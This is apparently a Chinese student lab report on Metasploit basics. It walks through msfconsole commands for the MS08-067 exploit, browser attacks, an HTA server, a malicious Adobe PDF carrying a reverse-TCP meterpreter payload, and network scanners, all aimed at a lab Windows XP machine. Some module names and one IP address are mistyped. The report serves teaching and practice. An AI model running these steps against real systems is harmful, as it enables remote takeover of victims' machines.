2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用

一、实践内容

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践:MS08-067(成功)

  • 一个针对浏览器的攻击:MS10_002_aurora(失败)、browser_autpwn2(成功)、vm_1漏洞系统BodgeIt(成功且唯一)

  • 一个针对客户端的攻击:adobe_toolbutton(成功)

  • 一个辅助模块:http_vertion(成功且唯一)、ssh_vertion(成功且唯一)、arp_sweep(成功)

二、报告内容


基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

    • exploit:MSF的攻击模块,它的功能是将payload(有效攻击载荷)顺利传送到靶机中,分为主动攻击和被动攻击两种模式。

    • payload:有效攻击载荷,在靶机中实际执行的一段恶意代码,作用一般是执行后能与攻击的主机建立连接,实现远程控制。

    • encode:编码模块,能够通过不同的编码方式对payload进行不同的编码,仅改变payload的一些“”

      外貌特征,不影响其功能

实践过程

  • 采用的靶机为:Windows XP SP3

一个主动攻击:MS08-067安全漏洞(成功)

  • 首先使用nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址查看靶机是否存在该漏洞

  • 然后在攻击机Kali的命令行中输入msfconsole进入控制台

  • 选择ms08-067漏洞 use exploit/windows/smb/ms08_067_netapi

  • 使用show options 查看需要设置的相关参数

  • 设置靶机的IP set RHOSTS 192.168.1.235

  • 选择有关tcp的反向连接的payload generic/shell_reverse_tcp

  • 设置监听者的IPset LHOST 192.168.1.123

  • 设置监听的端口号set LPORT 5320

  • 执行攻击 exploit

一个针对浏览器的攻击: MS10_002_aurora安全漏洞(失败)、broswer_autpwn2(成功)

  • 按照上个漏洞攻击同样的步骤,设置相关参数:

      msfconsole
    use exploit/windows/browser/ms10_002_aurora
    set payload generic/shell_reverse_tcp
    set LHOST 192.168.1.123 //设置kali攻击IP,
    set RHOST 192.168.1.235
    set SRVPORT 5320
  • 查看相关配置,确认有无差错

  • 执行exploit,生成一些URL链接

  • 在靶机IE输入刚刚生成的URL链接,结果出现错误

  • Kali端连接中断,攻击失败

  • 猜测是浏览器在访问过程中发生了一些错误,中断了回连的过程,应该是浏览器的安全设置问题。

  • 然后尝试第二次攻击:

      use auxiliary/server/browser_autopwn2
    set SRVHOST 192.168.56.1
    set URIPATH /test

  exploit

 

  • 使目标浏览器访问http://192.168.1.123/test

  • Kali虚拟机显示攻击成功。

  • 第三次攻击,唯一(vm_1漏洞系统BodgeIt)

      use exploit/windows/misc/hta_server
    set payload windows/shell/reverse_tcp
    set srvport 8888
    set lport 12345
    run

  • 现在切换到Windows虚拟机,打开IE浏览器,输入地址

  • 点击运行,回连成功

一个针对客户端的攻击:adobe_toolbutton安全漏洞(成功)

  • 进入msf模块,使用adobe_toolbutton进行攻击,设置相关参数

  • 输入以下命令,完成配置并创建PDF,打开显示隐藏文件,并在/root/.msf4/local/目录下找到20165320.pdf文件,如下图所示

      use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模块
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.123 //设置kali攻击IP,
    set LPORT 5320
    set FILENAME 20165320.pdf



  • 将该PDF拷到靶机上

  • 之后进入之前的监听模块,依次输入以下命令设置并监听即可,输入exploit后在靶机上打开pdf,回连成功

      use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.123
    set LPORT 5320
    exploit



一个辅助模块:http_vertion(成功且唯一)、ssh_vertion(成功且唯一)、arp_sweep(成功)

  • 使用http_vertion模块能够扫描靶机的http版本号

      use auxiliary/scanner/http/http_vertion
    set RHOST 192.168.1.157
    set THREADS 10
    set RPORT 80
    exploit

  • 使用ssh_vertion模块能够扫描靶机的ssh版本号

      use auxiliary/scanner/ssh/ssh_vertion
    set RHOST 192.1.235
    set THREADS 10
    set RPORT 80
    exploit

  • 使用arp_sweep 扫描网段的主机

      use auxiliary/scanner/discovery/arp_sweep
    set RHOSTS 192.168.1.0/24
    set THREADS 50
    exploit

实践总结与体会

  • 这一次实验我们熟悉了MSF的六大模块,也弄清楚了它们具体的用法,为我们以后的学习打下了一定的基础,但是也发现了许多操作系统已经修补了以前存在的漏洞,对于我们这样的新手来说,找到一个新的漏洞太难。

离实战还缺些什么技术或步骤

  • 主要还是理想很丰满,现实很骨感,能够攻击成功都是在一种理想的情况下,要想实战,许多苛刻的条件我们都没法实现。

2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  6. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  7. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  8. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

随机推荐

  1. python基础成长之路四-基础数据类型方法

    1,程序开发三大流程: 顺序--从上向下,顺序执行代码 分支--根据条件判断,决定执行代码的分支 循环--让特定的代码重复执行 2,whlie循环语句: Break 某一条件满足时,退出循环,不在执行 ...

  2. 【Gym 100733D】Little thief Shi(取数,DP)

    题 Shi realized that he was almost out of money, even renting Shitalian lands. Shi was walking on a s ...

  3. 【POI 每日题解 #4】 [POI2008]MAF-Mafia

    [POI2008]MAF-Mafia 很容易看出是拓扑 但不容易想出来怎么做[可能是我太菜 首先 入度为零的人是肯定死不了的 接着 我们分成环和链分析 对于一个链 最多的情况就是顺着一个个开枪 最后剩 ...

  4. [luogu#2019/03/10模拟赛][LnOI2019]长脖子鹿省选模拟赛赛后总结

    t1-快速多项式变换(FPT) 题解 看到这个\(f(x)=a_0+a_1x+a_2x^2+a_3x^3+ \cdots + a_nx^n\)式子,我们会想到我们学习进制转换中学到的,那么我们就只需要 ...

  5. bzoj4504 K个串 (优先队列+主席树)

    首先如果没有出现次数的限制的话,这题就是超级钢琴 但由于有了这个限制,不能简单地用前缀和 考虑顺着做的时候每个点的贡献,如果a[i]=x,x上次出现位置是lst[x](可以用一个map来记),那它会给 ...

  6. tensorflow GPU版本安装及配置

    经检测速度大幅度上升,不枉费我折腾了这么久,最坑的就是网上教程.书都没有写将cuda的bin加入全局变量,还是根据报错信息推出来的. 1.cuda9.0下载安装 https://developer.n ...

  7. android sqlite批量插入数据速度解决方案

    转自 http://hi.baidu.com/hfutonline/blog/item/62b1e4de8bdf4b2e5882dd28.html 最近在做android项目的时候遇到一个问题,应用程 ...

  8. ioi2018集训队自选题:最短路练习题

    题意:链接 定义pos[i]表示i这个值在数组里的下标. 我们先用单调栈找到每个元素左边和右边第一个比它大的元素$l_i$和$r_i$,然后建一棵二叉树,我们就叫做maxtree吧 (upd:mdzz ...

  9. bzoj2989&&4170数列——二进制分组+主席树

    题意的转化挺巧妙的 可以联想到曼哈顿距离! 并且,所谓的修改还要查询历史版本,并且修改之间不动只算一次,不就是给平面上加一个点吗? 看成(x,a[x])的点 就是一个菱形区域 转切比雪夫距离,变成矩形 ...

  10. A1023. Have Fun with Numbers

    Notice that the number 123456789 is a 9-digit number consisting exactly the numbers from 1 to 9, wit ...